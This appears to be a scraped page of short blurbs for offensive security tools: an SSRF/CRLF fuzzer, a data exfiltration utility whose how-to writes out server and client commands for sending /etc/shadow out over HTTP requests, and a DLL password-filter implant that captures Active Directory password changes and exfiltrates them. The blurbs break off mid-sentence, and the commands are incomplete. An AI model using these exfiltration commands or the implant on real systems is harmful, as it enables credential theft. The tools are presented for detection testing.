SSRFuzz – A Tool To Find Server Side Request Forgery Vulnerabilities, With CRLF Chaining Capabilities

SSRFuzz is a tool to find Server Side Request Forgery vulnerabilities, with CRLF chaining capabilities.

Why? I wanted to write a tool in Golang for concurrency. I wanted to fuzz parameters for SSRF vulnerabilities, as well as fuzz both paths and parameters for CRLF injections. I was inspired by Orange’s work for chaining these types

Lollipopz – Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.

Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server

    # ./ -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client

    $ ./ -m lollipopz.methods.http.param_cipher.GETClient -rh -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server

    # ./ -m lollipopz.methods.http.param_cipher.POSTServer -lp 80

DLLPasswordFilterImplant – DLL Password Filter Implant With Exfiltration Capabilities

DLLPasswordFilterImplant is a custom password filter DLL that allows the capture of a user’s credentials. Each password change event on a domain will trigger the registered DLL in order to exfiltrate the username and new password value prior to successfully changing it in the Active Directory (AD). For more information about password filters consult Microsoft’s documentation.

Installing To